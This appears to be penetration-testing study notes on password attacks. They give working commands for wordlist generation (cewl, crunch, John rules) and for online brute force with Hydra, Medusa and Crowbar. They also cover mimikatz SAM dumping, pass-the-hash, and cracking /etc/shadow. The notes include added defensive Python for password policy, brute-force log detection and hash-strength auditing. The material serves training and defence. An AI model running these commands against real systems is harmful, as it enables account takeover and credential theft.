Password Attacks
Wordlists
Targeted wordlists save time at the expense of lower coverage: the aim is to include the most likely passwords rather than every possible one.
Standard Wordlists
/usr/share/wordlists
To create custom password lists
cewl --help | less
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt # scrape the website, keep words of at least 6 characters and write them to a text file
Use John the Ripper's rules to mutate the wordlist into different password styles
sudo nano /etc/john/john.conf
# find the [List.Rules:Wordlist] section
# add rules there, e.g. append two digits to the end of each word:
$[0-9]$[0-9]
john --wordlist=megacorp-cewl.txt --rules --stdout > mutate.txt
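The following is an added example, not code from the page or from John the Ripper: it reproduces the effect of the `$[0-9]$[0-9]` rule on a small constructed stand-in for megacorp-cewl.txt, then turns it into a password-acceptance check, so a defender can see exactly which proposed passwords the wordlist-plus-rule combination would cover. `BASE_WORDS`, `expand_append_rule` and `weak_against_rule` are assumed names introduced here.

```python
import itertools
import re

# Constructed stand-in for megacorp-cewl.txt (assumption: a few site-specific words).
BASE_WORDS = ["megacorp", "welcome", "security"]


def _expand_class(spec):
    """Expand a bracket class such as "[0-9]" or "[a-c!]" into its characters."""
    inner = spec[1:-1]
    chars, i = [], 0
    while i < len(inner):
        if i + 2 < len(inner) and inner[i + 1] == "-":      # range lo-hi
            chars.extend(chr(c) for c in range(ord(inner[i]), ord(inner[i + 2]) + 1))
            i += 3
        else:                                               # single literal
            chars.append(inner[i])
            i += 1
    return chars


def expand_append_rule(words, rule):
    """Apply a John-style append rule ("$X" per appended character) to every word.

    Only the "$" command is implemented, with a literal or a [..] class, which is
    enough to reproduce the "$[0-9]$[0-9]" line from john.conf above. John's real
    rule engine supports far more commands (prefixes, case toggles, substitutions).
    """
    positions = []
    for spec in re.findall(r"\$(\[[^\]]+\]|.)", rule):
        positions.append(_expand_class(spec) if spec.startswith("[") else [spec])
    for word in words:
        for suffix in itertools.product(*positions):
            yield word + "".join(suffix)


def weak_against_rule(candidate, words=BASE_WORDS, rule="$[0-9]$[0-9]"):
    """True if a proposed password is one of the mutations (case-insensitive),
    i.e. it would fall to this wordlist + rule combination."""
    mutated = {w.lower() for w in expand_append_rule(words, rule)}
    return candidate.lower() in mutated


if __name__ == "__main__":
    for pw in ["Megacorp42", "megacorp2024", "Security07"]:
        print(pw, "-> rejected" if weak_against_rule(pw) else "-> ok")
```

Note that a two-digit append rule multiplies a three-word list into 300 candidates; the check rejects any of them regardless of capitalisation, which is the property a password policy needs when the underlying dictionary is public.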
Brute Force Wordlists
Test every possible password combination.
Generate brute-force candidates in a fixed pattern with crunch to save time:

| Placeholder | Character translation |
|---|---|
| @ | Lower case alpha characters |
| , | Upper case alpha characters |
| % | Numeric characters |
| ^ | Special characters including space |

crunch 8 8 -t ,@@^^%%% # minimum and maximum length 8; -t specifies the pattern
crunch 4 6 0123456789ABCDEF -o crunch.txt # length 4 to 6 using only the listed characters
# /usr/share/crunch/charset.lst holds predefined character sets
crunch 4 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch.txt # -f picks a set from the file; mixalpha = upper and lower case letters
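An added example (not part of the page and not crunch's code) that computes the keyspace behind the placeholder table and the two crunch invocations above, and compares it with unrestricted printable ASCII of the same length. The point for a defender is how much a predictable structure (capital, letters, symbols, digits) shrinks the search; the symbol-set size of 33 is an assumption approximating crunch's default set, and all function names are introduced here.

```python
import string

# Character-set sizes behind crunch's -t placeholders (table above). The symbol count
# is an assumption approximating crunch's default symbol set (33 with space); the
# authoritative sets live in /usr/share/crunch/charset.lst.
PLACEHOLDER_SIZES = {
    "@": len(string.ascii_lowercase),   # 26
    ",": len(string.ascii_uppercase),   # 26
    "%": len(string.digits),            # 10
    "^": 33,                            # assumed symbol-set size
}
FULL_PRINTABLE = 95                     # every printable ASCII character


def pattern_keyspace(pattern):
    """Candidates produced by 'crunch N N -t <pattern>'; literal characters count 1."""
    total = 1
    for ch in pattern:
        total *= PLACEHOLDER_SIZES.get(ch, 1)
    return total


def charset_keyspace(charset_size, min_len, max_len):
    """Candidates produced by 'crunch <min> <max> <charset>' over every length."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def hours_to_exhaust(keyspace, guesses_per_second):
    return keyspace / guesses_per_second / 3600


def structure_penalty(pattern):
    """How many times smaller the patterned keyspace is than unrestricted printable
    ASCII of the same length: a measure of how much predictable structure costs."""
    return charset_keyspace(FULL_PRINTABLE, len(pattern), len(pattern)) / pattern_keyspace(pattern)


if __name__ == "__main__":
    pat = ",@@^^%%%"
    print(f"{pat}: {pattern_keyspace(pat):,} candidates, "
          f"{structure_penalty(pat):,.0f}x fewer than any 8 printable chars")
    print(f"online at 100/s: {hours_to_exhaust(pattern_keyspace(pat), 100):,.0f} h; "
          f"offline at 1e9/s: {hours_to_exhaust(pattern_keyspace(pat), 1e9):.2f} h")
    print(f"crunch 4 6 0123456789ABCDEF: {charset_keyspace(16, 4, 6):,} candidates")
```

The same eight-character pattern that is hopeless against a rate-limited login (tens of thousands of hours at 100 guesses per second) is exhausted in minutes offline, which is why hash exposure, not only weak online lockout, is the scenario a password policy has to be measured against.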
Common Network Service Attack Methods
HTTP htaccess Attack with Medusa
medusa -h <HOST IP> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin # -M module, -m module option (the .htaccess-protected directory)
Remote Desktop Protocol Attack with Crowbar
sudo apt install crowbar
crowbar -b rdp -s <HOST IP>/32 -u admin -C <password file> -n 1 # -b protocol, -s target in CIDR notation, -C password list, -n number of threads
SSH Attack with THC-Hydra
# -l target username
# -P wordlist
# protocol://IP: the protocol and the target IP address
hydra -l kali -P <pwd file> ssh://<IP>
HTTP POST Attack with THC-Hydra
hydra http-form-post -U | less # show the module's help for the extra arguments a form needs
# look at the web page source first to understand how the form is built
hydra <IP> http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P <pwd file> -vV -f
# -f: stop after the first successful login; -vV: verbose output
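The defender's side of the SSH attack above, as an added example that is not part of the page: a small detector over a constructed auth.log excerpt that flags a source exceeding a failure threshold within a time window, and separately flags a successful login from a source that had already crossed it (the signature of a password that was guessed). The log lines, hostnames and addresses are constructed; `detect_bruteforce` and `parse_line` are names introduced here.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample auth.log excerpt (not real traffic): a burst of failures from one
# source, followed by a success, plus a single unrelated failure.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 web01 sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Mar  3 10:15:02 web01 sshd[1203]: Failed password for kali from 203.0.113.5 port 51236 ssh2
Mar  3 10:15:02 web01 sshd[1205]: Failed password for kali from 203.0.113.5 port 51238 ssh2
Mar  3 10:15:03 web01 sshd[1207]: Failed password for kali from 203.0.113.5 port 51240 ssh2
Mar  3 10:15:04 web01 sshd[1209]: Failed password for kali from 203.0.113.5 port 51242 ssh2
Mar  3 10:15:05 web01 sshd[1211]: Accepted password for kali from 203.0.113.5 port 51244 ssh2
Mar  3 10:20:00 web01 sshd[1300]: Failed password for bob from 198.51.100.7 port 40000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse_line(line, year=2024):
    """Return (timestamp, result, user, source) for an sshd auth line, else None.
    syslog timestamps carry no year, so one is assumed for the parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]


def detect_bruteforce(log_text, threshold=4, window_seconds=60):
    """Alert on sources with >= threshold failures inside a sliding window, and on
    any later success from a source that was already flagged."""
    recent = defaultdict(deque)        # source -> timestamps of failures in window
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if not parsed:
            continue
        ts, result, user, src = parsed
        window = recent[src]
        while window and (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()           # drop failures older than the window
        if result == "Failed":
            window.append(ts)
            if len(window) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("BRUTE_FORCE", src, len(window)))
        elif src in flagged:
            alerts.append(("SUCCESS_AFTER_BRUTE_FORCE", src, user))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(*alert)
```

The same two-stage logic (burst, then success from the burst source) transfers to the web form case by swapping the regex for an access-log pattern on repeated POSTs to the login path, and to RDP by reading the equivalent Windows logon-failure events.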
Leveraging Password Hashes
Retrieving Password Hashes
hashid "<hash>" # analyze hash
Use mimikatz to retrieve password hashes from Windows
# within mimikatz
privilege::debug
token::elevate # elevate from high integrity to SYSTEM integrity
lsadump::sam # dump the local SAM hashes
Passing the Hash in Windows
Use the hash to authenticate instead of the clear text password. Because Windows does not salt its NT hashes, a hash is static: if two machines have the same username and password, the hash taken from one machine can be used to log in to the other.
pth-winexe -U <USERNAME>%<HASH> //<IP> cmd
Password Cracking
The process of recovering the clear text of a password from its hashed form.
# windows hashes
john hash.txt --format=NT
john --wordlist=<word list> hash.txt --format=NT
john --rules --wordlist=<word list> hash.txt --format=NT
# Linux cracking
grep <username> /etc/passwd > pwd-file.txt
sudo grep <username> /etc/shadow > shadow-file.txt
unshadow pwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=<wordlist, e.g. rockyou.txt> unshadowed.txt
# --fork multithreads on older versions (the default in newer versions)
# --node distributes the load across multiple computers
John is limited by CPU speed; hashcat (https://hashcat.net) uses the GPU instead.
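How long the john step above takes depends mostly on which hash scheme the shadow file uses, and identifying a hash by its prefix is the same idea as the `hashid` call earlier on the page. The following audit is an added example, not the page's or John's code: it classifies every entry of a constructed /etc/shadow excerpt (hash bodies are placeholders) by algorithm and relative cracking cost, and lists accounts a defender should fix first, that is, empty passwords, md5crypt and legacy DES crypt. `classify_hash`, `audit_shadow` and `weak_accounts` are names introduced here.

```python
# Constructed /etc/shadow excerpt (hash bodies are placeholders, not real digests).
SAMPLE_SHADOW = """\
root:$6$Qx9Lk2Pe$PLACEHOLDERHASH:19700:0:99999:7:::
alice:$y$j9T$Ab3dE$PLACEHOLDERHASH:19700:0:99999:7:::
bob:$1$s4lts4lt$PLACEHOLDERHASH:19700:0:99999:7:::
legacy:Ab3dEf9hIjKlM:19700:0:99999:7:::
svc-backup:*:19700:0:99999:7:::
kiosk::19700:0:99999:7:::
"""

# Prefix -> (algorithm, relative cracking cost). md5crypt and DES crypt fall to GPU
# cracking orders of magnitude faster than the iterated or memory-hard schemes.
ALGORITHMS = {
    "$1$": ("md5crypt", "weak"),
    "$5$": ("sha256crypt", "ok"),
    "$6$": ("sha512crypt", "ok"),
    "$y$": ("yescrypt", "strong"),
    "$2b$": ("bcrypt", "strong"),     # less common on Linux, seen on BSDs
}


def classify_hash(field):
    """Map a shadow password field to (label, strength)."""
    if field == "":
        return "empty password", "weak"
    if field.startswith(("*", "!")):
        return "locked", "n/a"
    for prefix, (name, strength) in ALGORITHMS.items():
        if field.startswith(prefix):
            return name, strength
    if "$" not in field and len(field) == 13:           # traditional DES crypt
        return "descrypt", "weak"
    return "unknown", "unknown"


def audit_shadow(text):
    """Return [(user, label, strength)] for every entry in a shadow file."""
    results = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        label, strength = classify_hash(fields[1])
        results.append((fields[0], label, strength))
    return results


def weak_accounts(text):
    """Users whose password field would be cheap (or free) to recover."""
    return [user for user, _, strength in audit_shadow(text) if strength == "weak"]


if __name__ == "__main__":
    for user, label, strength in audit_shadow(SAMPLE_SHADOW):
        print(f"{user:12} {label:16} {strength}")
    print("fix first:", weak_accounts(SAMPLE_SHADOW))
```

On a live system the same function runs over `sudo cat /etc/shadow`; moving weak entries to yescrypt or sha512crypt (via the PAM/login.defs ENCRYPT_METHOD setting and a password change) is what makes the cracking step expensive enough for a GPU rig to matter.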